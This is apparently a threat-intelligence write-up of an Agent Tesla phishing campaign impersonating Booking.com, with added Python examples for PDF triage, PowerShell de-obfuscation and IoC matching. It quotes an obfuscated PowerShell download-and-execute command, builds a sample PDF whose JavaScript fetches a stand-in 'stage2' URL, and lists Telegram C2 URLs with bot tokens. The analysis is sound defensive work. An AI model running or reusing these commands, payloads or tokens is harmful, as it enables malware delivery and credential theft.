An analysis of a travel-industry phishing campaign that impersonates Booking.com and delivers Agent Tesla through a PDF attachment. The infection chain runs from the malicious PDF to obfuscated JavaScript, a downloaded PowerShell stage, a DLL dropper, registry and security-control evasion, and finally data exfiltration to Telegram C2 channels.
Key points
- Phishing email impersonates Booking.com and uses a PDF attachment to lure victims into opening malicious content.
- Static PDF analysis reveals object streams (ObjStm) and embedded scripts that fetch the next-stage payload from remote URLs.
- The PDF offers two routes to the next-stage payload: a fake pop-up link the victim must click, and embedded VBScript/JavaScript that downloads it directly.
- Multi-layer string obfuscation hides the PowerShell that downloads and executes the Agent Tesla dropper.
- The final DLL performs registry changes, AMSI/Defender evasion and process injection, then steals browser credentials and exfiltrates them via Telegram.
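The second and third points describe the static PDF triage step: suspicious keywords such as /JavaScript, /JS and /OpenAction may not be visible to a plain string search when the objects carrying them are packed into a FlateDecode-compressed object stream (/ObjStm). The following is an added example written for this page, not code from the Forcepoint analysis or any PDF tool; it inflates every FlateDecode stream and reports keywords that appear only after inflation. The sample PDF it builds is constructed here (no real campaign file, example.invalid URL) to show exactly that case.

```python
import re
import zlib

# pdfid-style triage keywords: /JS and /JavaScript carry script, /OpenAction
# and /AA run an action without a click, /Launch and /URI reach outside the
# file, /EmbeddedFile hides a payload, /ObjStm can hide any of the others in a
# compressed object stream that a raw keyword scan never sees.
SUSPICIOUS = [b"/JavaScript", b"/JS", b"/OpenAction", b"/AA", b"/Launch",
              b"/URI", b"/EmbeddedFile", b"/ObjStm"]
AUTO_EXEC = ("/JavaScript", "/JS", "/OpenAction", "/Launch")

OBJ_RE = re.compile(rb"\d+\s+\d+\s+obj(.*?)endobj", re.S)
# Greedy body so a stream ending in 0x0D is not truncated by the optional \r.
STREAM_RE = re.compile(rb"stream\r?\n(.*)\r?\nendstream", re.S)


def count_keywords(data: bytes) -> dict:
    """Count each keyword as a whole PDF name (so /JS does not count /JSX)."""
    return {k.decode(): len(re.findall(re.escape(k) + rb"(?![A-Za-z0-9])", data))
            for k in SUSPICIOUS}


def decoded_streams(pdf: bytes):
    """Yield the inflated body of every FlateDecode stream in the file."""
    for obj in OBJ_RE.finditer(pdf):
        body = obj.group(1)
        if b"/FlateDecode" not in body:
            continue
        m = STREAM_RE.search(body)
        if m is None:
            continue
        try:
            yield zlib.decompress(m.group(1))
        except zlib.error:
            pass  # corrupt or multi-filter stream: the raw scan still applies


def triage(pdf: bytes) -> dict:
    """Keyword counts on the raw file and on inflated streams, plus a verdict."""
    raw = count_keywords(pdf)
    inflated = count_keywords(b"\n".join(decoded_streams(pdf)))
    hidden_only = sorted(k for k, n in inflated.items() if n and not raw[k])
    return {
        "raw": raw,
        "inflated": inflated,
        "hidden_only": hidden_only,
        "suspicious": bool(hidden_only) or any(raw[k] for k in AUTO_EXEC),
    }


def build_sample_pdf() -> bytes:
    """Constructed sample, not a file from the campaign: the catalog's
    /OpenAction points at object 4, which exists only inside a compressed
    object stream, so the JavaScript is invisible to a raw string search."""
    inner = b"<< /S /JavaScript /JS (app.launchURL('http://example.invalid/stage2', true)) >>"
    header = b"4 0\n"                      # "objnum offset" pair: object 4 at offset 0
    packed = zlib.compress(header + inner)
    objstm = (b"3 0 obj\n<< /Type /ObjStm /N 1 /First %d /Length %d /Filter /FlateDecode >>\n"
              b"stream\n" % (len(header), len(packed)) + packed + b"\nendstream\nendobj\n")
    return (b"%PDF-1.5\n"
            b"1 0 obj\n<< /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >>\nendobj\n"
            b"2 0 obj\n<< /Type /Pages /Kids [] /Count 0 >>\nendobj\n"
            + objstm + b"trailer\n<< /Root 1 0 R >>\n%%EOF\n")


if __name__ == "__main__":
    print(triage(build_sample_pdf()))
```

On the constructed sample the raw scan sees only /OpenAction and /ObjStm; /JavaScript and /JS surface only after inflation, which is why a triage tool that stops at the raw keyword count under-reports this kind of document.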
MITRE Techniques
- [T1566.001] Spearphishing Attachment – The campaign uses a phishing email with a PDF attachment impersonating Booking.com to lure victims. Quote: ‘The email here is an example of scamming and brand impersonation where sender is seeking a refund of a reservation made at Booking.com and asking recipient to check the attached PDF for the card statement.’
- [T1059.005] VBScript – The PDF contains embedded VBScript (ExecuteGlobal) or, in some samples, JavaScript that downloads the final-stage PowerShell payload directly. Quote: ‘Parallelly it has embedded vbscript ExecuteGlobal code or in some files JavaScript code to download directly final stage remote powershell payload’
- [T1059.007] JavaScript – In some samples the PDF embeds JavaScript that initiates the download of the next-stage payload. Quote: ‘Parallelly it has embedded vbscript ExecuteGlobal code or in some files JavaScript code to download directly final stage remote powershell payload’
- [T1086] PowerShell – PowerShell is launched with the execution policy bypassed, fetches the final stage over TLS and dot-sources it through Invoke-Expression, with the iex alias itself hidden behind a string replace. Quote: ‘powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;$(irm htloctmain25[.]blogspot[.]com//////////////atom.xml) | . ('i*&*&*x').replace('*&*&*','e');Start-Sleep -Seconds 5’
- [T1105] Ingress Tool Transfer – The analysis notes two methods to download the next stage payload from remote servers. Quote: ‘From the objects in the PDF, we can see it uses two different methods to download the next stage payload.’
- [T1112] Modify Registry – The dropper changes registry keys (CLSIDs) and DLL names, affecting AMSI/Defender. Quote: ‘modifying registries sets up CLSID in the registry with a DLL name “C:IDontExist.dll”. The registry changes also affects AMSI and disables it by overriding the Microsoft Defender COM objects.’
- [T1562.001] Impair Defenses – The malware disables security features and overrides Defender components. Quote: ‘disable security features executed with admin privileges. Next, the script makes changes to registry, services, and firewalls using netsh.’
- [T1055] Process Injection – After dropping the final DLL, it injects into Regsvcs.exe and MSbuild.exe. Quote: ‘After dropping the final .dll file, it performs process injection in Regsvcs.exe and MSbuild.exe.’
- [T1041] Exfiltration Over C2 Channel – Exfiltrated data is sent to a private Telegram chat room. Quote: ‘it … sends the exfiltrated data to a private Telegram chat room.’
- [T1059.005] Credentials in Browser (Credential Access) – The dropper aims to steal credentials and personal data from web browsers. Quote: ‘the goal of stealing credentials and other personal data from web Browsers and stealing of personal data.’
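The PowerShell command line quoted under T1086 defeats naive keyword matching by building the iex alias at run time from ('i*&*&*x').replace('*&*&*','e'). The following added example, written for this page rather than taken from the Forcepoint analysis or any product, shows how a detection pipeline can fold such literal-only string transforms (method-call .replace and '+' concatenation of literals) without executing anything, then apply indicator checks to the de-obfuscated text. The indicator names and regular expressions are this example's own choices; the first test input is the page's quoted command line with its domain left defanged, the others are constructed.

```python
import re

# Fold literal-only string transforms that loaders use to hide "iex"
# (Invoke-Expression) from keyword matching. Only string literals are
# rewritten; nothing is executed. [char] casts and -join are not handled.
REPLACE_RE = re.compile(
    r"""\(\s*(['"])(.*?)\1\s*\)\s*\.replace\(\s*(['"])(.*?)\3\s*,\s*(['"])(.*?)\5\s*\)""",
    re.I)
CONCAT_RE = re.compile(r"""(['"])([^'"]*)\1\s*\+\s*(['"])([^'"]*)\3""")


def deobfuscate(cmd: str) -> str:
    """Repeat folding until the command line stops changing."""
    prev = None
    while prev != cmd:
        prev = cmd
        cmd = REPLACE_RE.sub(
            lambda m: "'" + m.group(2).replace(m.group(4), m.group(6)) + "'", cmd)
        cmd = CONCAT_RE.sub(lambda m: "'" + m.group(2) + m.group(4) + "'", cmd)
    return cmd


# Indicator patterns (this example's own naming). Each one alone is weak;
# the combination seen on this page is what a rule should score.
INDICATORS = {
    # -ep / -exec / -ExecutionPolicy followed by Bypass
    "execution_policy_bypass": re.compile(r"-e[a-z]*\s+bypass", re.I),
    # download cmdlets and aliases used to pull the next stage
    "remote_download": re.compile(
        r"\b(?:irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring|downloadfile)\b",
        re.I),
    # the alias only appears after folding, which is the point of the exercise
    "invoke_expression": re.compile(r"\biex\b|invoke-expression", re.I),
    # ". 'iex'" / ". (expr)" dot-sourcing a string or expression
    "dot_source_execution": re.compile(r"""(?:^|[\s|;])\.\s+['"(\$]"""),
}


def analyze(cmd: str) -> dict:
    plain = deobfuscate(cmd)
    hits = [name for name, rx in INDICATORS.items() if rx.search(plain)]
    if plain != cmd:
        hits.append("string_obfuscation")
    return {"deobfuscated": plain, "indicators": sorted(hits)}


# The page's quoted command line, domain kept defanged (not a live URL here).
PAGE_CMD = ("powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = "
            "[Net.SecurityProtocolType]::Tls12;$(irm htloctmain25[.]blogspot[.]com"
            "//////////////atom.xml) | . ('i*&*&*x').replace('*&*&*','e');"
            "Start-Sleep -Seconds 5")

if __name__ == "__main__":
    print(analyze(PAGE_CMD))
```

Run against process-creation telemetry (Sysmon event 1, EDR command-line fields) the folding step is what turns the quoted line into plain text containing 'iex', so the Invoke-Expression indicator fires even though the raw command line never contains that token.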
Indicators of Compromise
- [Spoofed Senders] Paola@intel-provider[.]com, booking[.]com@stellantises[.]com, and 5 more
- [PDF Hashes] f7c625f1d3581aa9a3fb81bb26c02f17f0a4004e, c82467b08c76b2e7a2239e0e1c7c5df7519316e2, and 2 more hashes
- [JavaScript Hashes] a1c7b79e09df8713c22c4b8f228af4869502719a, 67ccb505a1e6f3fa18e2a546603f8335d777385b, and 1 more
- [PowerShell Hashes] a1919c59ab67de195e2fe3a835204c9f1750f319, 83e8d610343f2b57a6f6e4608dec6f030e0760da, and 1 more
- [DLL Hashes] a7dd09b4087fd620ef59bed5a9c51295b3808c35, ffcd7a3a80eb0caf019a6d30297522d49311feec, and 1 more
- [Malicious URLs] hotelofficeewn[.]blogspot[.]com////////////atom.xml, bo0klng[.]blogspot[.]com/, bit[.]ly/newbookingupdates, bio0king[.]blogspot[.]com/
- [Malicious URLs] htloctmain25[.]blogspot[.]com//////////////atom.xml, bitbucket[.]org/!api/2.0/snippets/nigalulli/eqxGG9/a561b2b0d79b4cc9062ac8ef8fbc0659df660611/files/file, booking-c[.]blogspot[.]com////////atom.xml
- [Malicious URLs] htlfeb24[.]blogspot[.]com//////////////////////////////atom.xml, bit[.]ly/newbookingupdate, 4c1c6c2c-3624-42cb-a147-0b3263050851[.]usrfiles[.]com/ugd/4c1c6c_a6f8a2e6200e45219ab51d2fea9439ff.txt
- [C2s] Api[.]telegram[.]org/bot6796626947:AAGohe-IHhj5LD7VpBLcRBukReMwBcOmiTo/sendDocument, Api[.]telegram[.]org/bot6775303908:AAHd23oi4Hfc-xrVIpxaoy_LMKRuUmb2KZM/sendDocument
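The URL indicators above are published defanged and several carry runs of slashes in the path (blogspot serves atom.xml regardless of how many there are), so an exact-match blocklist built from the raw strings would miss the same resource fetched with a different slash count. The following added example, not part of the original analysis, normalises the page's URL IoCs (refang, drop scheme, lower-case host, collapse repeated slashes, strip query string) and matches them against proxy log lines. The log lines are constructed for the example; the IoC strings are the ones listed on this page, and the host-only entry bo0klng[.]blogspot[.]com/ is treated as matching any path on that host.

```python
import re

# URL IoCs exactly as published above (still defanged in source).
PUBLISHED_IOCS = [
    "hotelofficeewn[.]blogspot[.]com////////////atom.xml",
    "bo0klng[.]blogspot[.]com/",
    "bit[.]ly/newbookingupdates",
    "htloctmain25[.]blogspot[.]com//////////////atom.xml",
    "booking-c[.]blogspot[.]com////////atom.xml",
    "bit[.]ly/newbookingupdate",
]


def refang(s: str) -> str:
    """Undo the common defanging conventions: [.] (.) [:] and hxxp(s)."""
    s = s.replace("[.]", ".").replace("(.)", ".").replace("[:]", ":")
    return re.sub(r"^hxxp", "http", s, flags=re.I)


def canonical(url: str) -> str:
    """Scheme dropped, host lower-cased, repeated slashes collapsed, query and
    fragment removed, trailing slash stripped so 'host/' equals 'host'."""
    url = refang(url.strip())
    url = re.sub(r"^[a-z][a-z0-9+.-]*://", "", url, flags=re.I)
    url = url.split("?", 1)[0].split("#", 1)[0]
    host, _, rest = url.partition("/")
    rest = re.sub(r"/{2,}", "/", "/" + rest).rstrip("/")
    return host.lower() + rest


IOC_SET = {canonical(i) for i in PUBLISHED_IOCS}

# Accept both live and defanged schemes so the matcher also works on
# analyst notes and ticket text, not only on raw proxy logs.
URL_RE = re.compile(r"(?:hxxps?|https?)://\S+", re.I)


def match_log(lines) -> list:
    """Return (line_no, canonical_url) for each line that hits the IoC set.
    A host-only IoC (no path) matches every URL on that host."""
    hits = []
    for n, line in enumerate(lines, 1):
        for raw in URL_RE.findall(line):
            c = canonical(raw)
            host = c.split("/", 1)[0]
            if c in IOC_SET or host in IOC_SET:
                hits.append((n, c))
    return hits


# Constructed proxy log lines (not from any real incident).
SAMPLE_LOG = [
    "1714000000.101 10.0.0.5 GET http://htloctmain25.blogspot.com//atom.xml 200 text/xml",
    "1714000000.102 10.0.0.5 GET https://BO0KLNG.blogspot.com/2024/05/update.html 200 text/html",
    "1714000000.103 10.0.0.7 GET https://bit.ly/newbookingupdate?src=mail 302 -",
    "1714000000.104 10.0.0.7 GET https://bit.ly/some-other-link 302 -",
    "1714000000.105 10.0.0.9 GET https://www.booking.com/index.html 200 text/html",
]

if __name__ == "__main__":
    for hit in match_log(SAMPLE_LOG):
        print(hit)
```

Line 1 matches although the log shows two slashes and the published IoC fourteen; line 2 matches on host alone; line 3 matches once the query string is removed; the unrelated bit.ly link on line 4 does not, because bit.ly itself is never added as a host-only indicator.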
Read more: https://www.forcepoint.com/blog/x-labs/agent-tesla-malware-attacks-travel-industry